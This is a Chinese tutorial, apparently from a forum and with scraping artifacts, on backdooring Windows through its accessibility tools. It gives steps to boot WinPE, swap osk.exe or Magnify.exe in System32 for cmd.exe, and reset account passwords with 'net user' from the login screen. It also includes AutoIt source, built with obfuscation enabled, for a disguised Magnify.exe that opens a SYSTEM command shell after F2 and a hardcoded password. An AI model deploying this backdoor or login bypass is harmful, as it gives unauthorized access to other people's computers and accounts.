这其实很简单就是利用下面这个原理,但是这个操作需要你能进入winpe。如果你有需要可以部署一个后门。
使用方法:
C:\Windows\System32\Magnify.exe 更名 C:\Windows\System32\Magnifyk.exe
这个操作需要先在文件 属性 安全 高级 所有人 中把程序所有者换成administrator,更改后可以  换回来。
然后编辑文件Magnify.exe放在C:\Windows\System32\目录下
然后再开机时 按 辅助程序 再按 放大镜 应用
然后 按 F2 输入密码 13249
然后按提示输入命令就可以了
原理: 
   
   
   
   
    
    
    
    
    
  1. 1、从U盘或者光盘的PE启动,进入PE系统,找到windows目录下的system32文件夹,备份cmd.exe和osk.exe两个文件到别的盘。 
    2. 
    
    
    
    
  2. 2、将osk.exe文件删除或者改名,将cmd.exe文件改名为osk.exe 
    3. 
    
    
    
    
  3. 3、从硬盘引导系统,到登录界面,在左下角打开屏幕键盘,由于我们在第二部进行了处理所以会自动调用cmd命令行。 
    4. 
    
    
    
    
  4. 4、输入命令:net user username newpassword 例如我的用户名huaner要改系统开机登录密码为123456的话命令内容是: 
    5. 
    
    
    
    
  5. net user huaner 123456 
    6. 
    
    
    
    
  6. 最后等待提示完成后即可用新的开机密码登录windows7系统了,推荐以后将cmd.exe和osk.exe改回,不然以后调用的时候会出问题,如果不使用屏幕键盘的话可以不改回oks.exe,不过以后谁都能轻易破解修改掉你的windows7开机登录密码,毕竟我们的操作还要用一次PE呢。 
    7. 
   
   
   
   
AU3源代码
    
    
    
    
    
     
     
     
     
  1. #region ;**** 参数创建于 ACNWrapper_GUI ****
    2. 
     
     
     
     
  2. #PRE_UseUpx=n
    3. 
     
     
     
     
  3. #PRE_Run_Obfuscator=y
    4. 
     
     
     
     
  4. #endregion ;**** 参数创建于 ACNWrapper_GUI ****
    5. 
     
     
     
     
  5. HotKeySet("{F2}", "pass") 
    6. 
     
     
     
     
  6. Run(@ScriptDir & "\Magnifyk.exe") 
    7. 
     
     
     
     
  7. While 1 
    8. 
     
     
     
     
  8.         Sleep(500) 
    9. 
     
     
     
     
  9. WEnd 
    10. 
     
     
     
     
  10. Func pass() 
    11. 
     
     
     
     
  11.         #include 
    12. 
     
     
     
     
  12.         #include 
    13. 
     
     
     
     
  13.         #include 
    14. 
     
     
     
     
  14.         #include 
    15. 
     
     
     
     
  15.         #region ### START Koda GUI section ### Form=
    16. 
     
     
     
     
  16.         $Form1_1 = GUICreate("", 246, 74, 382, 317) 
    17. 
     
     
     
     
  17.         $Input1 = GUICtrlCreateInput("", 8, 8, 225, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_PASSWORD)) 
    18. 
     
     
     
     
  18.         $Button1 = GUICtrlCreateButton("", 8, 40, 227, 25) 
    19. 
     
     
     
     
  19.         GUISetState(@SW_SHOW) 
    20. 
     
     
     
     
  20.         #endregion ### END Koda GUI section ###
    21. 
     
     
     
     
  21. While 1 
    22. 
     
     
     
     
  22.                 $nMsg = GUIGetMsg() 
    23. 
     
     
     
     
  23.                 Switch $nMsg 
    24. 
     
     
     
     
  24. Case $GUI_EVENT_CLOSE 
    25. 
     
     
     
     
  25. Exit
    26. 
     
     
     
     
  26. Case $Button1 
    27. 
     
     
     
     
  27. If GUICtrlRead($Input1) = 13249 Then
    28. 
     
     
     
     
  28.                                         MsgBox(0, "将密码改为123456", "net user administrator 123456") 
    29. 
     
     
     
     
  29.                                         Run(@ScriptDir & "\cmd.exe") 
    30. 
     
     
     
     
  30.                                 EndIf 
    31. 
     
     
     
     
  31.                 EndSwitch 
    32. 
     
     
     
     
  32.         WEnd 
    33. 
     
     
     
     
  33. EndFunc   ;==>pass 
    34. 
    
    
    
    
大家下载AU3程序编译就可以使用了。